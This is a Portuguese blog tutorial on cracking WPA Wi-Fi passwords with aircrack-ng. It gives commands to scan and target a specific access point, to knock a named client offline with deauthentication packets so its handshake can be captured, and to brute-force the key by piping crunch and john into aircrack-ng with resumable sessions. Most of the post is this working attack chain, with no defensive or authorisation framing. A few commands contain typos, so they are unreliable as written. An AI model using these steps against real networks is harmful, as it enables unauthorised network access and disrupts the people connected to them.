Capturando pacotes wifi - AirCrack e Utilizar Wordlist Gigantes sem ocupar espaço e salvando o progresso

Airodump-ng


O airodump-ng, faz parte do aircrack-ng e permite capturar todos os pacotes no alcance do cartão de Wifi, também pode ser utilizado para escanear todas as redes Wifi no alcance e obter informação deles.



Para usar deve-se fazer o comando

Habilitar o modo monitor
> airmon-ng start wlan0
Iniciar o airodump-ng
> airodump-ng mon0


BSSID = MAC Address
PWR = Power, Demonstra a distância que este Wifi está. Quanto menor mais próximo e mais fácil de capturar pacotes.
ESSID = O nome do Wifi
Beacons = Sinais que o AP envia, cada um envia pacotes para se comunicar a todos os dispositivos
Data = O número de pacotes úteis que podemos receber
#/S = os pacotes coletados nos últimos 10 segundos
CH = Channel o canal que está esse Access Point
MB = A velocidade máxima que esse AP alcanca
ENC = Encryption WPA ou WPA2 etc…
CIPHER = Cifra utilizada para descriptografar
AUTH = Autorização

Podemos utilizar o airodump-ng em um alvo específico e gravar toda a informação em um arquivo e depois analisar com wireshark, porém se o pacote estiver criptografado não terá muita utilidade.

Fazemos isso com o comando

airodump-ng --channel[channel] --bssid[bssid] --write[nome do arquivo] [interface]

Por exemplo:
Vamos fazer com essa que está selecionada

> airodump-ng --channel 2 --bssid 00:10:18:90:2D:EE --write test-upc mon0


Agora só temos informação do Access Point que nos interessa.
A primeira sessão, de cim, nos mostra todos os dados desse AP

A Segunda sessão, de Baixo nos mostra todos os clientes associados a esse AP
STATION = O MAC Address do cliente conectado

Os arquivos foram gravados no Linux e podem ser analisados com Wireshark. Porém eles estão criptografados, veremos depois como podemos descriptografá-los em outro post.

Ganhando acesso ao Handshake

Capturar os pacotes de um cartão específico, vamos com a rede chamada test-ap

> airodump-ng --channel 11 --bssid 00:10:18:90:2D:EE --write test-handshake mon0


Agora precisamos capturar o Handshake que acontece toda vez que um novo dispositivo se conecta com alguma rede. Por isso precisamos derrubar essa rede por um pequeno tempo e acessar ela, faremos isso com o método de deautenticação.


Precisamos desligar esse dispositivo da rede.

aireplay-ng --deauth 4 -a [MAC do AP] -c [MAC do alvo STATION] [Interface]
> aireplay-ng --deauth 4 -a :00:10:18:90:2D:EE -c C0:18:85:C1:CF:01 mon0


Podemos ver lá em cima que foi capturado o handshake e o alvo não recebeu nenhuma notícia de desconexão pois foi por um período muito curto.

Usando uma Wordlist gigante sem ocupar espaço

Vamos usar uma ferramenta para criar Wordlist chamada crunch porém não iremos salvar essa wordlist no computador, iremos enviar o output dela para o aircrack-ng e iremos salvar o progresso com uma ferramenta chamada John

> crunch 8 8 | john --stdin --session=session1 --stdout | aircrack-ng -b [bssi do alvo] -w -handshake-01.cap


Para parar e retornar o john fazemos o comando

> Crunch 8 8 | john --restore=session1 | aircrack-ng -b [bssi do alvo] -w -handshake-01.cap



Comentários

  1. se vc ainda estiver vivo será que poderia me responder?
    nessa linha aqui:
    crunch 8 8 | john --stdin --session=session1 --stdout | aircrack-ng -b [bssi do alvo] -w -handshake-01.cap

    o handshake-01.cap é o handshake capturado anteriormente com o airodump né?

    ResponderExcluir

Postar um comentário

Mais visitadas

Usando GPU para Brute-Force com HashCat

Ataque Evil Twin

XSS - Cross-site scripting

Man-in-the-Middle e MITMf - DNS Spoofing e suas defesas

Mitmproxy 1 - Conhecendo

Ataque pelo servidor - Metasploit - Nexpose